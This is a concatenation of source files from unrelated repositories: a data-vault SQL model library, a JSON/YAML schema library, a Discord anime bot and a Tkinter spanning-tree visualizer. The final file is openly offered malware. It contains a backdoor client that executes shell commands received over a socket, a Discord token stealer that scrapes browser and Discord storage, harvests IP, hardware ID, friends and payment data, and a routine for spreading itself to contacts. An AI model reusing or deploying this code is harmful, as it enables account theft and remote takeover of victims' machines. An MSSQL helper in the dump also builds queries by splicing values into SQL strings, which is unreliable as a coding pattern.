self.compute_service = compute_service
self.new_definition = new_definition
self.old_definition = old_definition
keys = (
set(self.new_definition.keys()) |
set(self.old_definition.keys())
)
self._data = {
key: BaseModel.subclass_instance(
self,
self.new_definition.get(key),
self.old_definition.get(key)
)
for key in keys
}
@property
def config(self) -> Config:
return self._config
@LazyProperty
def metadata(self) -> MetaData:
return MetaData()
def create_tables_ddl(self) -> List[DDLElement]:
files = []
for satellite_owner_model in self.satellite_owners.values():
files += satellite_owner_model.files
for satellite_model in self.satellites.values():
files += satellite_model.files
return files
def create_history_views(self) -> List[DDLElement]:
return [
view
for satellite_model in self.satellites.values()
if isinstance(satellite_model, SatelliteModel)
for view in satellite_model.history_views
]
def create_current_views(self) -> List[DDLElement]:
return [
view
for satellite_model in self.satellites.values()
if isinstance(satellite_model, SatelliteModel)
for view in satellite_model.current_views
]
```
#### File: jetavator/sql_model/SatelliteOwnerModel.py
```python
from typing import Optional, Dict, List
from abc import ABC, abstractmethod
from sqlalchemy import Table, Column, Index, PrimaryKeyConstraint
from sqlalchemy.schema import SchemaItem, DDLElement
from sqlalchemy.types import *
from jetavator.schema_registry import SatelliteOwner
from jetavator.services import StorageService
from ..VaultAction import VaultAction
from .BaseModel import BaseModel
from .SatelliteModelABC import SatelliteModelABC
from .functions import hash_keygen
class SatelliteOwnerModel(BaseModel[SatelliteOwner], ABC, register_as="satellite_owner"):
@property
def files(self) -> List[DDLElement]:
return self.vault_files() + self.star_files()
def vault_files(self) -> List[DDLElement]:
if self.action == VaultAction.CREATE:
return self.create_tables(self.tables)
else:
return []
def star_files(self, with_index=False) -> List[DDLElement]:
if self.definition.exclude_from_star_schema:
return []
else:
return (
self.create_or_alter_tables(self.star_tables, with_index)
)
# @property
# def create_views(self) -> List[CreateView]:
# return [CreateView(
# self.updates_pit_view,
# self.updates_pit_view_query
# )]
#
# @property
# def drop_views(self) -> List[DropView]:
# return [DropView(self.updates_pit_view)]
@property
def tables(self) -> List[Table]:
return [
self.table
]
@property
def star_tables(self) -> List[Table]:
return [
self.star_table
]
@property
def star_prefix(self) -> str:
return self.definition.star_prefix
@property
def key_columns(self) -> List[Column]:
return self.definition.alias_key_columns(self.definition.name)
def index_kwargs(
self,
storage_service: StorageService
) -> Dict[str, bool]:
return {
x: self.definition.option(x)
for x in storage_service.index_option_kwargs
}
def index(
self,
storage_service: StorageService,
name: str,
alias: Optional[str] = None
) -> Index:
alias = alias or self.definition.name
return Index(
f"ix_{name}",
self.definition.alias_primary_key_column(alias),
unique=False,
**self.index_kwargs(storage_service)
)
def index_or_key(
self,
storage_service: StorageService,
name: str,
alias: Optional[str] = None
) -> SchemaItem:
alias = alias or self.definition.name
if self.definition.option("no_primary_key"):
return self.index(storage_service, name, alias)
else:
return PrimaryKeyConstraint(
self.definition.alias_primary_key_name(alias),
name=f"pk_{name}",
**self.index_kwargs(storage_service)
)
def custom_indexes(self, table_name) -> List[Index]:
return [
index
for satellite_model in self.star_satellite_models.values()
for index in satellite_model.custom_indexes(table_name)
]
@property
def record_source_columns(self) -> List[Column]:
return [
Column(f"{self.definition.type}_load_dt", DateTime(), nullable=True),
Column(f"{self.definition.type}_record_source", String(), nullable=True),
]
@property
@abstractmethod
def role_specific_columns(self) -> List[Column]:
pass
@property
def table_columns(self) -> List[Column]:
return [
*self.key_columns,
*self.record_source_columns,
*self.role_specific_columns
]
@property
def table(self) -> Table:
return self.define_table(
self.definition.table_name,
*self.table_columns,
self.index_or_key(
self.vault_storage_service,
f"{self.definition.type}_{self.definition.name}"),
*self.satellite_owner_indexes(
self.vault_storage_service,
f"{self.definition.type}_{self.definition.name}"),
schema=self.vault_schema
)
@property
def star_satellite_columns(self) -> List[Column]:
return [
column
for satellite_model in self.star_satellite_models.values()
for column in satellite_model.satellite_columns
]
@property
def star_table(self) -> Table:
return self.define_table(
self.definition.star_table_name,
*self.key_columns,
*self.role_specific_columns,
*self.star_satellite_columns,
self.index_or_key(
self.star_storage_service,
f"{self.star_prefix}_{self.definition.name}"),
*self.satellite_owner_indexes(
self.star_storage_service,
f"{self.star_prefix}_{self.definition.name}"),
*self.custom_indexes(
f"{self.star_prefix}_{self.definition.name}"),
schema=self.star_schema
)
@property
def star_satellite_models(self) -> Dict[str, SatelliteModelABC]:
return {
satellite_model.definition.name: satellite_model
for satellite_model in self.project.satellites.values()
if satellite_model.definition.parent.key == self.definition.key
and satellite_model.action != VaultAction.DROP
and not satellite_model.definition.exclude_from_star_schema
}
@abstractmethod
def satellite_owner_indexes(
self,
storage_service: StorageService,
table_name: str
) -> List[Index]:
pass
def generate_table_keys(self, source_table, alias=None):
alias = alias or self.definition.name
if self.definition.option("hash_key"):
hash_key = [hash_keygen(
source_table.c[self.definition.alias_key_name(alias)]
).label(self.definition.alias_hash_key_name(alias))]
else:
hash_key = []
return hash_key + [
source_table.c[self.definition.alias_key_name(alias)]
]
```
#### File: jetavator/sql_model/SourceModel.py
```python
from sqlalchemy.sql.ddl import DDLElement
from typing import List
from jetavator.schema_registry import Source
from .BaseModel import BaseModel
class SourceModel(BaseModel[Source], register_as="source"):
@property
def files(self) -> List[DDLElement]:
return []
```
|
{
"source": "jetavator/jetavator_mssql",
"score": 2
}
|
#### File: jetavator_mssql/services/MSSQLService.py
```python
from typing import Iterable, Set
import pandas
import sqlalchemy
from sqlalchemy.exc import ProgrammingError, DBAPIError
from lazy_property import LazyProperty
from jetavator.services import StorageService
class MSSQLService(StorageService, register_as='mssql'):
index_option_kwargs: Set[str] = {"mssql_clustered"}
@LazyProperty
def sqlalchemy_connection(self):
if self.config.trusted_connection:
return sqlalchemy.create_engine(
"mssql+pyodbc://{server}:1433/{database}"
"?driver=ODBC+Driver+17+for+SQL+Server".format(
server=self.config.server,
database=self.config.database
),
connect_args={'autocommit': True},
deprecate_large_types=True
)
else:
return sqlalchemy.create_engine(
"mssql+pyodbc://{username}:{password}@{server}:1433/{database}"
"?driver=ODBC+Driver+17+for+SQL+Server".format(
username=self.config.username,
password=self.<PASSWORD>,
server=self.config.server,
database=self.config.database
),
connect_args={'autocommit': True},
deprecate_large_types=True
)
def execute(self, sql):
sql_statement = sql.encode("ascii", "ignore").decode("ascii")
try:
result_proxy = self.sqlalchemy_connection.execute(
sql_statement
)
except (ProgrammingError, DBAPIError) as e:
raise Exception(
f"""
Config dump:
{self.config}
                Error while trying to run script:
{sql_statement}
""" + str(e)
)
if result_proxy.returns_rows:
df = pandas.DataFrame(result_proxy.fetchall())
if df.shape != (0, 0):
df.columns = result_proxy.keys()
return df
else:
return pandas.DataFrame()
def drop_schema(self):
self.sqlalchemy_connection.execute(
f"""
DECLARE @drop_statements AS CURSOR
DECLARE @statement AS VARCHAR(max)
SET @drop_statements = CURSOR FOR
SELECT 'DROP VIEW [{self.config.schema}].[' + TABLE_NAME + ']'
FROM INFORMATION_SCHEMA.VIEWS
WHERE TABLE_SCHEMA = '{self.config.schema}'
UNION ALL
SELECT 'DROP TABLE [{self.config.schema}].[' + TABLE_NAME + ']'
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA = '{self.config.schema}'
AND TABLE_TYPE = 'BASE TABLE'
OPEN @drop_statements
FETCH NEXT FROM @drop_statements INTO @statement
WHILE @@FETCH_STATUS = 0
BEGIN
EXECUTE (@statement)
FETCH NEXT FROM @drop_statements INTO @statement
END
CLOSE @drop_statements
DEALLOCATE @drop_statements
"""
)
self.sqlalchemy_connection.execute(
f"DROP SCHEMA [{self.config.schema}]"
)
def create_schema(self):
self.sqlalchemy_connection.execute(
"CREATE SCHEMA [" + self.config.schema + "]"
)
@property
def schema_empty(self):
return (
len(
self.sqlalchemy_connection.execute(
f"""
SELECT TOP 1
TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_CATALOG = '{self.config.database}'
AND TABLE_SCHEMA = '{self.config.schema}'
"""
).fetchall()
) == 0
)
@property
def schema_exists(self):
return self._sql_exists(
f"""
SELECT SCHEMA_NAME
FROM INFORMATION_SCHEMA.SCHEMATA
WHERE CATALOG_NAME = '{self.config.database}'
AND SCHEMA_NAME = '{self.config.schema}'
"""
)
def _sql_exists(self, sql):
result_proxy = self.sqlalchemy_connection.execute(sql)
return bool(result_proxy.first())
def table_exists(self, table_name):
return self._sql_exists(
f"""
SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_CATALOG = '{self.config.database}'
AND TABLE_SCHEMA = '{self.config.schema}'
AND TABLE_NAME = '{table_name}'
"""
)
def column_exists(self, table_name, column_name):
return self._sql_exists(
f"""
SELECT COLUMN_NAME
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_CATALOG = '{self.config.database}'
AND TABLE_SCHEMA = '{self.config.schema}'
AND TABLE_NAME = '{table_name}'
AND COLUMN_NAME = '{column_name}'
"""
)
def sql_query_single_value(self, sql):
try:
return self.sqlalchemy_connection.execute(
sql
).first()[0]
except TypeError:
return None
# def execute_sql_element(
# self,
# sqlalchemy_element: sqlalchemy.sql.expression.Executable,
# async_cursor: bool = False
# ) -> pandas.DataFrame:
# return self.sqlalchemy_connection.execute(sqlalchemy_element).fetchall()
def test(self) -> None:
self.execute("SELECT 1")
def load_dataframe(self, dataframe: pandas.DataFrame, source_name: str, source_column_names: Iterable[str]) -> None:
# TODO: Implement MSSQLService.load_dataframe
raise NotImplementedError()
# def compile_sqlalchemy(
# self,
# sqlalchemy_element: sqlalchemy.sql.expression.ClauseElement
# ) -> str:
# return super().compile_sqlalchemy(sqlalchemy_element).replace("DATETIME", "DATETIME2")
```
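Note that the metadata helpers above (`schema_exists`, `table_exists`, `column_exists`) splice catalog, schema and table names into the SQL text with f-strings. Below is a minimal sketch of the same lookup using bound parameters instead; it assumes a SQLAlchemy 1.x engine such as the one built by `sqlalchemy_connection`, and the `engine` variable is a stand-in for illustration, not part of the original service.
```python
# Sketch only: a parameterised variant of table_exists, assuming a SQLAlchemy 1.x engine.
import sqlalchemy

def table_exists(engine, catalog: str, schema: str, table_name: str) -> bool:
    stmt = sqlalchemy.text(
        "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES "
        "WHERE TABLE_CATALOG = :catalog "
        "AND TABLE_SCHEMA = :schema "
        "AND TABLE_NAME = :table_name"
    )
    # first() returns None when nothing matches, so bool() yields the existence flag
    return bool(engine.execute(stmt, catalog=catalog, schema=schema, table_name=table_name).first())
```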
|
{
"source": "jetavator/wysdom",
"score": 3
}
|
#### File: examples/modules/json_module.py
```python
from typing import Dict, List
from wysdom import UserObject, UserProperty, SchemaArray, SchemaDict, ReadsJSON, key
class Vehicle(UserObject):
color: str = UserProperty(str)
description: str = UserProperty(str)
@property
def license(self):
return key(self)
class Address(UserObject):
first_line: str = UserProperty(str)
second_line: str = UserProperty(str)
city: str = UserProperty(str)
postal_code: str = UserProperty(int)
class Person(UserObject, ReadsJSON):
first_name: str = UserProperty(str)
last_name: str = UserProperty(str)
current_address: Address = UserProperty(Address)
previous_addresses: List[Address] = UserProperty(SchemaArray(Address))
vehicles: Dict[str, Vehicle] = UserProperty(SchemaDict(Vehicle))
```
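For orientation, a `Person` defined as above can be populated directly from plain builtins. The sketch below follows the pattern used elsewhere in this entry (the DOM classes accept a dict-like value in their constructor), so treat the exact constructor behaviour as an assumption rather than documented API.
```python
# Sketch only: building the example Person from a plain dict; constructor usage is assumed.
person = Person({
    "first_name": "Marge",
    "last_name": "Simpson",
    "current_address": {
        "first_line": "742 Evergreen Terrace",
        "second_line": "",
        "city": "Springfield",
        "postal_code": 58008,
    },
    "previous_addresses": [],
    "vehicles": {
        "ABC-1234": {"color": "orange", "description": "station wagon"},
    },
})
print(person.current_address.city)          # properties resolve through UserProperty
print(person.vehicles["ABC-1234"].license)  # license returns key(self), i.e. "ABC-1234"
```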
#### File: wysdom/dom/DOMDict.py
```python
from __future__ import annotations
from typing import Generic, TypeVar, Optional, Any, Dict
from collections.abc import Mapping
from ..base_schema import Schema, SchemaAnything
from .DOMElement import DOMElement
from .DOMObject import DOMObject
from . import DOMInfo
from .DOMProperties import DOMProperties
T_co = TypeVar("T_co")
class DOMDict(DOMObject, Generic[T_co]):
"""
An object with dynamic properties (corresponding to a Python dict).
"""
def __init__(
self,
value: Optional[Mapping[str, Any]] = None,
json_dom_info: Optional[DOMInfo] = None,
item_type: Optional[Schema] = None,
) -> None:
"""
:param value: A dict (or any :class:`collections.abc.Mapping`) containing the data to populate this
object's properties.
:param json_dom_info: A :class:`~wysdom.dom.DOMInfo` named tuple containing information about this object's
position in the DOM.
:param item_type: A :class:`~wysdom.Schema` object specifying what constitutes a valid property
of this object.
"""
self.__json_schema_properties__ = DOMProperties(
additional_properties=(item_type or SchemaAnything())
)
super().__init__(value or {}, json_dom_info)
def __getitem__(self, key: str) -> T_co:
return super().__getitem__(key)
def __deepcopy__(self, memo: Dict[int, DOMElement]) -> DOMDict:
cls = self.__class__
result = cls(
value=self.to_builtin(),
json_dom_info=self.__json_dom_info__,
            item_type=self.__json_schema_properties__.additional_properties,
)
memo[id(self)] = result
return result
```
#### File: wysdom/dom/DOMProperties.py
```python
from typing import Dict, Union, Set
from ..base_schema import Schema
# TODO: DRY with object_schema.SchemaObject?
class DOMProperties(object):
"""
A container for property information for a :class:`.DOMObject`.
"""
properties: Dict[str, Schema] = None
required: Set[str] = None
additional_properties: Union[bool, Schema] = False
def __init__(
self,
properties: Dict[str, Schema] = None,
required: Set[str] = None,
additional_properties: Union[bool, Schema] = False,
) -> None:
"""
:param properties: A dictionary of :class:`~wysdom.base_schema.Schema` objects
defining the expected names and types of a :class:`.DOMObject`'s
properties.
:param required: A set of the property names that are required for an instance to be valid.
:param additional_properties: Defines whether a :class:`.DOMObject` permits additional
dynamically-named properties. Can be True or False, or
can be set to a specific :class:`~wysdom.Schema` to restrict the permitted
types of any additional properties.
"""
self.properties = properties or {}
self.required = required or set()
self.additional_properties = additional_properties
```
#### File: wysdom/mixins/ReadsYAML.py
```python
from __future__ import annotations
from typing import Any, Union, TextIO
import yaml
from ..dom import DOMObject
class ReadsYAML(DOMObject):
"""
Adds YAML reading and writing functionality to a DOMObject.
"""
def to_yaml(self, **kwargs: Any) -> str:
"""
Serialize the DOM object to YAML.
:param kwargs: Optional keyword arguments to pass to PyYAML's safe_dump method.
See parameters for Dumper in https://pyyaml.org/wiki/PyYAMLDocumentation
:return: The DOM object, serialized as a YAML string
"""
return yaml.safe_dump(self.to_builtin(), **kwargs)
@classmethod
def from_yaml(cls, yaml_string: Union[str, TextIO]) -> ReadsYAML:
"""
        Create a new DOM object from a YAML string.
:param yaml_string: YAML string to read
:return: New DOM object instance
"""
return cls(yaml.safe_load(yaml_string))
@classmethod
def from_yaml_file(cls, filename: str) -> ReadsYAML:
"""
Create a new DOM object from a file on disk.
:param filename: File path on disk of YAML file
:return: New DOM object instance
"""
with open(filename, "r") as stream:
return cls.from_yaml(stream)
```
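A short round trip through the two class methods and `to_yaml` above; the `Pet` class is a hypothetical stand-in built in the same style as the earlier `json_module.py` example, and the top-level import path for `ReadsYAML` mirrors the `ReadsJSON` import there rather than being confirmed API.
```python
# Sketch only: YAML round trip with a minimal, hypothetical DOM class.
from wysdom import UserObject, UserProperty, ReadsYAML

class Pet(UserObject, ReadsYAML):
    name: str = UserProperty(str)
    species: str = UserProperty(str)

pet = Pet.from_yaml("name: Rex\nspecies: dog")
print(pet.name)       # -> Rex
print(pet.to_yaml())  # serialises back through yaml.safe_dump
```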
#### File: wysdom/object_schema/SchemaDict.py
```python
from typing import Any, Type, Union, Optional
from ..dom import DOMInfo, DOMDict
from .SchemaObject import SchemaObject
from ..base_schema import Schema, SchemaPattern
from .resolve_arg_to_type import resolve_arg_to_schema
class SchemaDict(SchemaObject):
"""
A schema specifying an object with dynamic properties (corresponding to a Python dict)
:param items: The permitted data type or schema for the properties of this object.
Must be one of:
A primitive Python type (str, int, bool, float)
A subclass of `UserObject`
An instance of `Schema`
:param key_pattern: A regex pattern to validate the keys of the dictionary against.
"""
def __init__(
self, items: Union[Type, Schema], key_pattern: Optional[str] = None
) -> None:
super().__init__(
additional_properties=resolve_arg_to_schema(items),
property_names=(
None if key_pattern is None else SchemaPattern(key_pattern)
),
)
def __call__(self, value: Any, dom_info: DOMInfo = None) -> Any:
return DOMDict(value, dom_info, item_type=self.additional_properties)
```
|
{
"source": "jetBBlack/kawaii",
"score": 2
}
|
#### File: kawaii/cogs/anime_music.py
```python
import discord
from discord.ext import commands
class AnimeMusic(commands.Cog):
def __init__(self, client):
self.client = client
def setup(client):
client.add_cog(AnimeMusic(client))
```
#### File: jetBBlack/kawaii/services.py
```python
import requests
import json as js
from datetime import date
class Anime:
def __init__(self, url) -> None:
self.url = url
def get_list_top_airing_anime(self):
response = requests.get(self.url+"top/anime/1/airing")
if response.status_code == 200:
result ={}
result = js.loads(response.text)
return result.get("top")
else:
print("Failed to get data")
def get_list_top_anime_alltime(self):
response = requests.get(self.url+"top/anime/1")
if response.status_code == 200:
result ={}
result = js.loads(response.text)
return result.get("top")
else:
print("Failed to get data")
def get_list_upcomming_featured(self):
response = requests.get(self.url+"season/later")
if response.status_code == 200:
result ={}
result = js.loads(response.text)
return result.get("anime")
else:
print("Failed to get data")
def get_curr_ss_anime_list(self):
today = date.today()
cur_season = ''
spring = [2,3,4]
summer = [5,6,7]
fall = [8,9,10]
winter = [11,12,1]
if today.month in spring:
cur_season = 'spring'
elif today.month in summer:
cur_season = "summer"
elif today.month in fall:
cur_season = "fall"
elif today.month in winter:
cur_season = "winter"
response = requests.get(self.url+f"season/{today.year}/{cur_season}")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get("anime")
else:
print('Failed to get data')
def get_next_ss_anime_list(self):
today = date.today()
next_season = ''
next_year = 0
spring = [2,3,4]
summer = [5,6,7]
fall = [8,9,10]
winter = [11,12,1]
if (today.month+3) in spring:
next_season = 'spring'
elif (today.month+3) in summer:
next_season = "summer"
elif (today.month+3) in fall:
next_season = "fall"
elif (today.month+3) in winter:
next_season = "winter"
if today.month in [11, 12]:
next_year = today.year+1
else: next_year = today.year
response = requests.get(self.url+f"season/{next_year}/{next_season}")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get("anime")
else:
print('Failed to get data')
def get_anime_list_byYearandSs(self, season, year):
response = requests.get(f"{self.url}season/{year}/{season}")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get("anime")
else:
print('Failed to get data')
def search_by_name(self, name, type):
response = requests.get(f"{self.url}search/{type}?q={name}&limit=10")
if (response.status_code == 200):
result = {}
result = js.loads(response.content)
return result.get("results")
else:
print('Failed to get data')
def get_info_of_anime(self, anime_id, type='anime'):
response = requests.get(f"{self.url}{type}/{anime_id}")
if (response.status_code == 200):
result = {}
result = js.loads(response.content)
return result
else:
print('Failed to get data from API')
def get_top_manga(self, type):
response = requests.get(f"{self.url}top/manga/1/{type}")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get('result')
else:
print('Invalid type')
def get_list_character_byName(self, name):
response = requests.get(f"{self.url}search/character?q={name}&limit=10")
if (response.status_code == 200):
result = {}
result = js.loads(response.text)
return result.get('results')
else:
print('Failed to get data')
def get_list_top_character(self):
response = requests.get(f"{self.url}/top/characters/1/")
if (response.status_code == 200):
result = {}
result = js.loads(response.content)
return result.get('top')
else:
print('Failed to get data')
#Test request
# anime = Anime("https://api.jikan.moe/v3/")
# new_ss_list = anime.get_list_character_byName("Chtholly")
# for i in range(len(new_ss_list)):
# print(new_ss_list[i].get('name'))
```
|
{
"source": "jetbead/TCO18MMR1_Visualizer",
"score": 3
}
|
#### File: TCO18MMR1_Visualizer/src/visualizer.py
```python
import tkinter as tk
import random
from math import sqrt
def MST(pts):
INF = float(10**10)
def distance(u, v):
return sqrt((u[0] - v[0])**2 + (u[1] - v[1])**2)
V = len(pts)
if V <= 1:
return 0, list()
cost = [[distance(pts[i], pts[j]) for i in range(V)] for j in range(V)]
min_cost = [INF for i in range(V)]
min_cost[0] = 0
min_edge = [(-1,-1) for i in range(V)]
visited = [False for i in range(V)]
score = 0
edges = list()
while True:
best_v = -1
best_cost = INF
for t in range(V):
if visited[t]:
continue
if min_cost[t] < best_cost:
best_v = t
best_cost = min_cost[t]
if best_v == -1:
break
visited[best_v] = True
if best_v > 0:
edges.append(min_edge[best_v])
score += best_cost
for t in range(V):
if min_cost[t] > cost[best_v][t]:
min_cost[t] = cost[best_v][t]
min_edge[t] = (best_v, t)
return score, edges
class Visualizer:
CANVAS_WIDTH = 640
CANVAS_HEIGHT = 480
POINT_SIZE = 10
NUM_OF_RED_POINTS = 5
def __init__(self):
self.root = tk.Tk()
self.root.title("TCO18 MMR1 Visualizer")
self.draw_tk_objects()
def draw_tk_objects(self):
""" tkオブジェクトを配置 """
## キャンバス
self.canvas = tk.Canvas(self.root,
width=self.CANVAS_WIDTH,
height=self.CANVAS_HEIGHT)
self.canvas.bind("<Button-1>", self.canvas_click)
self.canvas.pack()
        ## Frame 1
frm = tk.LabelFrame(self.root,
text='設定',
relief='groove',
borderwidth=1)
frm.pack(fill="both")
b = tk.Button(frm, text='再描画',width=15)
b.bind("<Button-1>", self.draw)
b.pack(side='left')
b = tk.Button(frm, text='座標出力',width=15)
b.bind("<Button-1>", self.dump)
b.pack(side='left')
l = tk.Label(frm, text="jc:")
l.pack(side='left')
self.junction_cost = tk.Entry(frm)
self.junction_cost.insert(tk.END,"0.0")
self.junction_cost.pack(side='left')
        ## Frame 2
frm = tk.LabelFrame(self.root, text='モード', relief='groove', borderwidth=1)
frm.pack(fill="both")
self.mode_label = tk.Label(frm, text="[MOVE]")
self.mode_label.pack(side='left')
b = tk.Button(frm, text='追加',width=15)
b.bind("<Button-1>", self.add_mode)
b.pack(side='left')
b = tk.Button(frm, text='削除',width=15)
b.bind("<Button-1>", self.erase_mode)
b.pack(side='left')
b = tk.Button(frm, text='移動',width=15)
b.bind("<Button-1>", self.move_mode)
b.pack(side='left')
        # Score display
self.score_label = tk.Label(self.root, text="0.0")
self.score_label.pack()
def dump(self, ev):
""" 座標情報の出力 """
print("#red points")
for id in self.canvas.find_withtag("cpoint"):
coords = self.canvas.coords(id)
posx = int((coords[2]-coords[0])/2 + coords[0])
posy = int((coords[3]-coords[1])/2 + coords[1])
print(str(posx) + " " + str(posy))
print("#blue points")
for id in self.canvas.find_withtag("jpoint"):
coords = self.canvas.coords(id)
posx = int((coords[2]-coords[0])/2 + coords[0])
posy = int((coords[3]-coords[1])/2 + coords[1])
print(str(posx) + " " + str(posy))
def draw_line(self):
""" 最小全域木の辺の表示(スコア情報も更新) """
self.canvas.delete("line")
lst = list()
for id in self.canvas.find_withtag("cpoint"):
coords = self.canvas.coords(id)
posx = int((coords[2]-coords[0])/2 + coords[0])
posy = int((coords[3]-coords[1])/2 + coords[1])
lst.append((posx, posy))
for id in self.canvas.find_withtag("jpoint"):
coords = self.canvas.coords(id)
posx = int((coords[2]-coords[0])/2 + coords[0])
posy = int((coords[3]-coords[1])/2 + coords[1])
lst.append((posx, posy))
        # Build the minimum spanning tree
cost, edges = MST(lst)
        # Update the score
cost += float(self.junction_cost.get()) * len(self.canvas.find_withtag("jpoint"))
self.score_label['text'] = str(cost)
        # Draw the edges
for edge in edges:
self.canvas.create_line(lst[edge[0]][0], lst[edge[0]][1],
lst[edge[1]][0], lst[edge[1]][1],
tag="line")
self.canvas.tag_lower("line")
def draw(self, ev):
""" 赤点(cities)の描画 """
self.erase(ev)
for i in range(self.NUM_OF_RED_POINTS):
x = random.randint(0, self.CANVAS_WIDTH)
y = random.randint(0, self.CANVAS_HEIGHT)
id = self.canvas.create_oval(x-self.POINT_SIZE/2, y-self.POINT_SIZE/2,
x+self.POINT_SIZE/2, y+self.POINT_SIZE/2,
fill='#ff0000', tag="cpoint")
self.canvas.tag_bind(id, "<Button1-Motion>", lambda ev,id=id:self.move(ev, id))
self.draw_line()
def move(self, ev, id):
""" クリックされたオブジェクトの移動 """
x = ev.x
y = ev.y
self.canvas.coords('current',
x-self.POINT_SIZE/2, y-self.POINT_SIZE/2,
x+self.POINT_SIZE/2, y+self.POINT_SIZE/2)
self.draw_line()
def erase(self, ev):
""" キャンバス内のオブジェクトを全削除 """
self.canvas.delete("cpoint")
self.canvas.delete("jpoint")
self.canvas.delete("line")
self.draw_line()
def add_mode(self, ev):
""" 操作モードを「追加」モードにする """
self.mode_label['text'] = "[ADD]"
def erase_mode(self, ev):
""" 操作モードを「削除」モードにする """
self.mode_label['text'] = "[ERASE]"
def move_mode(self, ev):
""" 操作モードを「移動」モードにする """
self.mode_label['text'] = "[MOVE]"
def canvas_click(self, ev):
""" キャンバス内でクリックされた時の処理 """
if self.mode_label['text'] == "[ADD]":
self.add_point(ev.x, ev.y)
if self.mode_label['text'] == "[ERASE]":
self.canvas.delete('current')
self.draw_line()
def add_point(self, x, y):
""" 青点(junctions)の追加 """
id = self.canvas.create_oval(x-self.POINT_SIZE/2, y-self.POINT_SIZE/2,
x+self.POINT_SIZE/2, y+self.POINT_SIZE/2,
fill='#0000ff', tag="jpoint")
self.canvas.tag_bind(id, "<Button1-Motion>", lambda ev,id=id:self.move(ev, id))
self.draw_line()
def run(self):
self.root.mainloop()
def main():
vis = Visualizer()
vis.run()
if __name__ == '__main__':
main()
```
|
{
"source": "JetBerri/Stealer",
"score": 3
}
|
#### File: JetBerri/Stealer/malware.py
```python
def DepInstall():
os.system("python -m pip install socket >nul 2>&1")
os.system("python -m pip install subprocess >nul 2>&1")
os.system("python -m pip install re >nul 2>&1")
os.system("python -m pip install json >nul 2>&1")
os.system("python -m pip install base64 >nul 2>&1")
os.system("python -m pip install urllib3 >nul 2>&1")
os.system("python -m pip install threading >nul 2>&1")
os.system("python -m pip install time >nul 2>&1")
os.system("python -m pip install sys >nul 2>&1")
os.system("python -m pip install tk >nul 2>&1")
os.system("python -m pip install pygame >nul 2>&1")
f = open("verification.txt", "w")
f.write("Dependencies installed :) please don't delete this file or the program will keep trying to install the dependencies once it is ran again.")
f.close()
def DepCheck():
filecheck = os.path.isfile("verification.txt")
if filecheck == True:
pass
if filecheck == False:
DepInstall()
else:
print("Error. Skipped.")
DepCheck()
def BackdoorClient():
# Client for backdoor connection
# Requeried modules
import socket
import subprocess
IP = "127.0.0.1"
PORT = 8080
client = socket.socket()
try:
client.socket((IP,PORT)) # Ip and port
client.send("1".encode("ascii"))
while True: # Ready for executing commands
bytes = client.recv(1024)
cod = bytes.decode("ascii")
sub = subprocess.Popen(cod,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
client.send(sub.stdout.read())
except:
print("An error has occured while connecting to the server.")
pass
def TokenGrabber():
# Requeried modules
import os
if os.name != "nt": # Check if it's a computer running windows
exit() # If is not, the program will close
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
WEBHOOK_URL = "" # The webhook that will be used
# Some paths
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord": ROAMING + "\\Discord",
"Discord Canary": ROAMING + "\\discordcanary",
"Discord PTB": ROAMING + "\\discordptb",
"Google Chrome": LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera": ROAMING + "\\Opera Software\\Opera Stable",
"Brave": LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex": LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
# Get the header
def getHeader(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
if token:
headers.update({"Authorization": token})
return headers
# Some info about the user
def getUserData(token):
try:
return loads(
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode())
except:
pass
# Get token by extracting it from the path
def getTokenz(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
# Who am I function
def WhoAmI():
ip = "None"
try:
ip = urlopen(Request("https://ifconfig.me")).read().decode().strip()
except:
pass
return ip
# Hardware
def hWiD():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
# Discord friends
def getFriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships",
headers=getHeader(token))).read().decode())
except:
pass
# Get channels
def getChat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token),
data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
# Get the payment method
def paymentMethods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources",
headers=getHeader(token))).read().decode())) > 0)
except:
pass
# Message ID
def sendMessages(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token,
"multipart/form-data; boundary=---------------------------325414537030329320151394843687"),
data=form_data.encode())).read().decode()
except:
pass
# Spread function
def spread(token, form_data, delay):
return # ¡¡¡¡Remove to re-enabled (If you remove this line, malware will spread itself by sending the binary to friends)!!!!
for friend in getFriends(token):
try:
chat_id = getChat(token, friend["id"])
sendMessages(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
